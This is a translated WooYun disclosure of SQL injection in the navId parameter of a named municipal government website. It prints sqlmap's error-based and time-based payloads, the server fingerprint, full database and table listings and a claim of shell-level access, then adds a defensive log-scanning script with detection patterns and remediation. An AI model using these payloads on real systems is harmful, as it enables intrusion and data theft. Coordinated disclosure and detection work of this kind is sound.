
Vulnerability summary

Defect ID: wooyun-2015-0111402

Title: SQL injection in the Binzhou Municipal Intellectual Property Office (滨州市知识产权局) website; a shell can be obtained

Vendor: Binzhou Municipal Intellectual Property Office

Author: Yang

Submitted: 2015-05-25 17:20

Fixed: 2015-07-14 01:04

Published: 2015-07-14 01:04

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 12

Status: Handed over to a third-party partner organization (CNCERT, National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure timeline:

2015-05-25: Details reported to the vendor; awaiting the vendor's handling
2015-05-30: Vendor confirmed; details disclosed to the vendor only
2015-06-09: Details disclosed to core white hats and relevant domain experts
2015-06-19: Details disclosed to regular white hats
2015-06-29: Details disclosed to intern white hats
2015-07-14: Details disclosed to the public

Summary:

SQL injection in the Binzhou Municipal Intellectual Property Office website; a shell can be obtained.

Details:

The Binzhou Municipal Intellectual Property Office, also known as Yellow River Delta Intellectual Property (黄河三角洲知识产权):
http://www.bzipp.cn/news/list.aspx?navId=0202

(screenshot: 1.png)


sqlmap identified the following injection points with a total of 56 HTTP(s) requests:
---
Parameter: navId (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: navId=0202' AND 2794=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2794=2794) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'OudY'='OudY
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: navId=0202' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: navId (GET)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: navId=0202' AND 2794=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(107)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (2794=2794) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(118)+CHAR(122)+CHAR(113))) AND 'OudY'='OudY
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: navId=0202' WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2005
available databases [9]:
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb
[*] WebDB
[*] zscq
[*] zscqj
Database: WebDB
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.Opus | 9 |
| dbo.Users | 6 |
| dbo.Hobby | 3 |
| dbo.PersonType | 3 |
+--------------------------------------------------+---------+
Database: zscqj
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.a42CityPatentInfoFileFromProvince | 1950 |
| dbo.a42CityPatentInfoFileFromProvinceForDistrict | 1636 |
| dbo.aPublicModule1SmsSendInfo | 900 |
| dbo.a42SectorTown | 104 |
| dbo.a1User | 68 |
| dbo.aPublicModule2News | 52 |
| dbo.a6PatentInfringeProof | 39 |
| dbo.a41PatentStateQuery | 25 |
| dbo.a6SafeguardRightOnLine | 23 |
| dbo.a3PubishTransaction | 16 |
| dbo.a41PatentQueryForFee | 16 |
| dbo.a41FocusFieldsForEnterprise | 15 |
| dbo.a1UserType | 13 |
| dbo.a2TrainEFile | 10 |
| dbo.a42County | 10 |
| dbo.a4PatentDeclaration | 9 |
| dbo.aPublicModuleTopic | 9 |
| dbo.aPublicModuleBoard | 8 |
| dbo.aPublicModuleMessageOnline | 8 |
| dbo.a43DeclareActivityType | 6 |
| dbo.aPublicModule2NewsCategory | 6 |
| dbo.a3TransactionType | 5 |
| dbo.a4DpersonType | 5 |
| dbo.a81PLaws | 5 |
| dbo.a44GovFilesTransferedToCounty | 4 |
| dbo.a83PatentReport | 4 |
| dbo.a2Fftype | 3 |
| dbo.a2TrainEFileType | 3 |
| dbo.a3CorprateTransState | 3 |
| dbo.a4AuditState | 3 |
| dbo.a4PatentType | 3 |
| dbo.a82StatisticInfo | 3 |
| dbo.aPublicModuleMessageState | 3 |
| dbo.aPublicModulePantentLaw | 3 |
| dbo.aPublicModule1SystemSectorInvolveSms | 2 |
| dbo.aPublicModulePatentLawCategory | 2 |
| dbo.sysdiagrams | 2 |
| dbo.a2ExamFAQ | 1 |
| dbo.a2TrainActivity | 1 |
| dbo.a43DeclareActivity | 1 |
| dbo.a43DeclareActivityFileDeliverToApplicant | 1 |
| dbo.a5Deputy | 1 |
| dbo.a7LeavedMessageBoard | 1 |
+--------------------------------------------------+---------+
Database: zscq
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.news_info | 312 |
| dbo.user_info | 177 |
| dbo.jiaoyi_info | 124 |
| dbo.top_menu | 64 |
| dbo.D99_CMD | 26 |
| dbo.news_nav | 22 |
| dbo.liucheng | 19 |
| dbo.pangolin_test_table | 15 |
| dbo.liuyan | 14 |
| dbo.jiaoyi_nav | 3 |
| dbo.zixun | 3 |
| dbo.administrator | 1 |
+--------------------------------------------------+---------+
Database: msdb
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.MSdbms_datatype_mapping | 325 |
| dbo.sysdatatypemappings | 325 |
| dbo.MSdbms_map | 248 |
| dbo.MSdatatype_mappings | 174 |
| dbo.MSdbms_datatype | 141 |
| dbo.syscategories | 21 |
| dbo.backupfile | 14 |
| dbo.backupfilegroup | 7 |
| dbo.backupmediafamily | 7 |
| dbo.backupmediaset | 7 |
| dbo.backupset | 7 |
| dbo.MSdbms | 7 |
| dbo.sysmail_configuration | 7 |
| dbo.restorefile | 4 |
| dbo.sysdtscategories | 3 |
| dbo.restorefilegroup | 2 |
| dbo.restorehistory | 2 |
| dbo.sysdtspackagefolders90 | 2 |
| dbo.sysdbmaintplans | 1 |
| dbo.sysmail_servertype | 1 |
| dbo.sysoriginatingservers_view | 1 |
| dbo.systargetservers_view | 1 |
+--------------------------------------------------+---------+
Database: ReportServer
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| dbo.ConfigurationInfo | 17 |
| dbo.Roles | 8 |
| dbo.PolicyUserRole | 4 |
| dbo.Users | 3 |
| dbo.Keys | 2 |
| dbo.Policies | 2 |
| dbo.SecData | 2 |
| dbo.Catalog | 1 |
+--------------------------------------------------+---------+
Database: master
+--------------------------------------------------+---------+
| Table | Entries |
+--------------------------------------------------+---------+
| sys.messages | 67941 |
| sys.sysmessages | 67941 |
| sys.syscolumns | 11156 |
| sys.all_parameters | 6697 |
| sys.system_parameters | 6697 |
| sys.trace_subclass_values | 4722 |
| sys.all_columns | 4254 |
| sys.trace_event_bindings | 3958 |
| sys.system_columns | 3696 |
| sys.dm_os_memory_objects | 3385 |
| sys.syscomments | 2748 |
| sys.dm_os_ring_buffers | 2629 |
| dbo.spt_values | 2346 |
| sys.dm_os_memory_cache_entries | 2308 |
| sys.dm_os_buffer_descriptors | 2096 |
| sys.all_objects | 1808 |
| sys.sysobjects | 1808 |
| sys.system_objects | 1741 |
| sys.database_permissions | 1650 |
| sys.syspermissions | 1649 |
| sys.sysprotects | 1645 |
| sys.all_sql_modules | 1591 |
| sys.system_sql_modules | 1589 |
| sys.syscacheobjects | 1429 |
| sys.dm_exec_cached_plans | 1168 |
| sys.dm_os_virtual_address_dump | 1024 |
| sys.dm_os_performance_counters | 776 |
| sys.sysperfinfo | 776 |
| sys.system_internals_partition_columns | 693 |
| sys.columns | 558 |
| sys.dm_exec_query_transformation_stats | 376 |
| sys.stats_columns | 290 |
| sys.all_views | 284 |
| sys.system_views | 284 |
| sys.dm_db_index_usage_stats | 260 |
| sys.index_columns | 219 |
| sys.sysindexkeys | 219 |
| sys.dm_os_wait_stats | 194 |
| sys.event_notification_event_types | 193 |
| sys.sysindexes | 172 |
| sys.trace_events | 171 |
| sys.stats | 166 |
| sys.dm_os_memory_clerks | 146 |
| sys.dm_os_latch_stats | 136 |
| sys.dm_exec_query_stats | 130 |
| sys.dm_os_memory_cache_clock_hands | 124 |
| sys.syscharsets | 114 |
| sys.allocation_units | 112 |
| sys.system_internals_allocation_units | 112 |
| sys.dm_db_partition_stats | 101 |
| sys.indexes | 101 |
| sys.partitions | 101 |
| sys.system_internals_partitions | 101 |
| sys.system_components_surface_area_configuration | 98 |
| sys.xml_schema_facets | 97 |
| sys.xml_schema_components | 93 |
| sys.xml_schema_types | 77 |
| sys.dm_os_loaded_modules | 71 |
| sys.objects | 67 |
| sys.trace_columns | 65 |
| sys.configurations | 62 |
| sys.dm_os_memory_cache_counters | 62 |
| sys.sysconfigures | 62 |
| sys.syscurconfigs | 62 |
| INFORMATION_SCHEMA.COLUMNS | 50 |
| sys.fulltext_document_types | 50 |
| sys.dm_os_threads | 49 |
| sys.dm_os_memory_cache_hash_tables | 45 |
| INFORMATION_SCHEMA.COLUMN_PRIVILEGES | 44 |
| sys.dm_os_worker_local_storage | 41 |
| sys.dm_os_workers | 41 |
| sys.dm_exec_query_optimizer_info | 38 |
| sys.dm_os_memory_pools | 35 |
| sys.syslanguages | 33 |
| sys.dm_os_tasks | 28 |
| sys.systypes | 27 |
| sys.types | 27 |
| sys.sysprocesses | 24 |
| sys.dm_db_session_space_usage | 22 |
| sys.dm_db_task_space_usage | 22 |
| sys.dm_exec_sessions | 22 |
| sys.securable_classes | 21 |
| sys.server_principals | 21 |
| sys.trace_categories | 21 |
| sys.dm_tran_active_transactions | 20 |
| sys.dm_tran_database_transactions | 20 |
| sys.database_principals | 19 |
| sys.server_permissions | 19 |
| sys.sysusers | 19 |
| sys.master_files | 18 |
| sys.sysaltfiles | 18 |
| INFORMATION_SCHEMA.SCHEMATA | 17 |
| sys.dm_exec_requests | 17 |
| sys.fulltext_languages | 17 |
| sys.schemas | 17 |
| sys.xml_schema_component_placements | 17 |
| sys.service_message_types | 14 |
| sys.xml_schema_attributes | 14 |
| sys.dm_os_stacks | 13 |
| sys.syslogins | 12 |
| sys.dm_os_waiting_tasks | 11 |
| sys.service_contract_message_usages | 11 |
| sys.dm_os_schedulers | 10 |
| sys.database_mirroring | 9 |
| sys.database_recovery_status | 9 |
| sys.databases | 9 |
| sys.sysdatabases | 9 |
| sys.crypt_properties | 8 |
| INFORMATION_SCHEMA.TABLES | 6 |
| sys.server_role_members | 6 |
| sys.service_contracts | 6 |
| sys.syslockinfo | 6 |
| sys.tables | 6 |
| INFORMATION_SCHEMA.TABLE_PRIVILEGES | 5 |
| sys.certificates | 5 |
| sys.endpoints | 5 |
| sys.dm_tran_locks | 4 |
| dbo.MSreplication_options | 3 |
| sys.database_role_members | 3 |
| sys.dm_clr_properties | 3 |
| sys.dm_exec_connections | 3 |
| sys.dm_os_hosts | 3 |
| sys.identity_columns | 3 |
| sys.internal_tables | 3 |
| sys.login_token | 3 |
| sys.procedures | 3 |
| sys.service_queue_usages | 3 |
| sys.service_queues | 3 |
| sys.services | 3 |
| sys.sysmembers | 3 |
| sys.syssegments | 3 |
| sys.xml_schema_namespaces | 3 |
| INFORMATION_SCHEMA.ROUTINES | 2 |
| sys.database_files | 2 |
| sys.dm_broker_queue_monitors | 2 |
| sys.dm_fts_memory_pools | 2 |
| sys.key_encryptions | 2 |
| sys.service_contract_usages | 2 |
| sys.sql_logins | 2 |
| sys.sql_modules | 2 |
| sys.sysfiles | 2 |
| sys.tcp_endpoints | 2 |
| dbo.spt_monitor | 1 |
| sys.data_spaces | 1 |
| sys.default_constraints | 1 |
| sys.dm_db_file_space_usage | 1 |
| sys.dm_exec_background_job_queue_stats | 1 |
| sys.dm_os_sys_info | 1 |
| sys.dm_tran_current_transaction | 1 |
| sys.extended_procedures | 1 |
| sys.filegroups | 1 |
| sys.linked_logins | 1 |
| sys.routes | 1 |
| sys.servers | 1 |
| sys.symmetric_keys | 1 |
| sys.sysconstraints | 1 |
| sys.sysfilegroups | 1 |
| sys.sysoledbusers | 1 |
| sys.sysservers | 1 |
| sys.traces | 1 |
| sys.user_token | 1 |
| sys.via_endpoints | 1 |
| sys.xml_schema_collections | 1 |
| sys.xml_schema_model_groups | 1 |
| sys.xml_schema_wildcards | 1 |
+--------------------------------------------------+---------+
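
The two probe shapes sqlmap reports above for the navId parameter, an error-based CONVERT(INT, ...) probe and a time-based WAITFOR DELAY probe, leave a recognizable trace in the web server's request log, and a navigation id that should only ever be a short digit string (the page's real value is 0202) can be allow-listed at the input boundary. The following is an added example, not code from this report or from the affected site: a small Python scanner over constructed IIS-style log lines that flags requests where navId fails a digits-only allow-list or where the URL-decoded query string carries those MSSQL probe patterns. The log field order, the sample lines, the allow-list rule for navId and the rule names are all assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS-style log lines (assumed field order: date time method
# path query status). They are not from the report; the query strings reuse
# the two probe shapes sqlmap reported against navId, an error-based
# CONVERT(INT, ...) probe and a time-based WAITFOR DELAY probe.
SAMPLE_LOG = """\
2015-05-25 09:20:01 GET /news/list.aspx navId=0202 200
2015-05-25 09:20:02 GET /news/list.aspx navId=0202%27+AND+2794%3DCONVERT%28INT%2C%28SELECT+CHAR%28113%29%29%29+AND+%27OudY%27%3D%27OudY 500
2015-05-25 09:20:08 GET /news/list.aspx navId=0202%27+WAITFOR+DELAY+%270%3A0%3A5%27-- 200
2015-05-25 09:20:09 GET /news/list.aspx navId=0203 200
"""

# Token shapes that never belong in a navigation id. Rule order is the order
# in which matches are reported.
SUSPICIOUS = [
    ("quote-breakout", re.compile(r"'")),
    ("mssql-error-based", re.compile(r"\bCONVERT\s*\(\s*INT\b", re.IGNORECASE)),
    ("mssql-time-based", re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE)),
    ("sql-comment", re.compile(r"--|/\*")),
]

# Allow-list for navId. The page's real value is 0202, so a short digit
# string is assumed here; the site's actual rule is not known.
NAV_ID_RE = re.compile(r"\d{1,8}")


def is_valid_nav_id(value: str) -> bool:
    """True only if navId is a short digit string (allow-list check)."""
    return NAV_ID_RE.fullmatch(value) is not None


def classify_query(query: str) -> list:
    """Names of SUSPICIOUS rules matching the URL-decoded query string."""
    decoded = unquote_plus(query)
    return [name for name, rx in SUSPICIOUS if rx.search(decoded)]


def parse_line(line: str):
    """Split one log line into a dict, or None if it does not have 6 fields."""
    parts = line.split()
    if len(parts) != 6:
        return None
    keys = ("date", "time", "method", "path", "query", "status")
    return dict(zip(keys, parts))


def scan_iis_log(text: str) -> list:
    """Return one finding per request whose navId fails the allow-list or
    whose decoded query matches a SUSPICIOUS rule."""
    findings = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        params = dict(p.split("=", 1) for p in rec["query"].split("&") if "=" in p)
        nav_id = unquote_plus(params.get("navId", ""))
        rules = classify_query(rec["query"])
        if rules or (nav_id and not is_valid_nav_id(nav_id)):
            findings.append({
                "time": rec["date"] + " " + rec["time"],
                "path": rec["path"],
                "status": rec["status"],
                "navId": nav_id,
                "rules": rules,
            })
    return findings


if __name__ == "__main__":
    for f in scan_iis_log(SAMPLE_LOG):
        print(f["time"], f["status"], f["rules"], repr(f["navId"]))
```

Log scanning of this kind only tells a defender that probing happened; the error-based probe typically shows up with a 500 status because the CONVERT failure is what leaks data. The root fix is to bind navId as a query parameter instead of concatenating it into the SQL string, with the allow-list check applied before the value reaches the data layer.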

Proof of vulnerability:

(screenshot: 1.png)


With this level of privilege, isn't that a shell right there?

(three further screenshots, each extracted as 1.png)

Remediation:

Copyright notice: please credit the source when reposting: Yang@乌云 (WooYun)


Responses

Vendor response:

Severity: High

Vulnerability Rank: 13

Confirmed: 2015-05-30 01:02

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been passed to CNCERT, which forwarded it to the Shandong branch center to coordinate handling with the website's operating unit.

Latest status:

None yet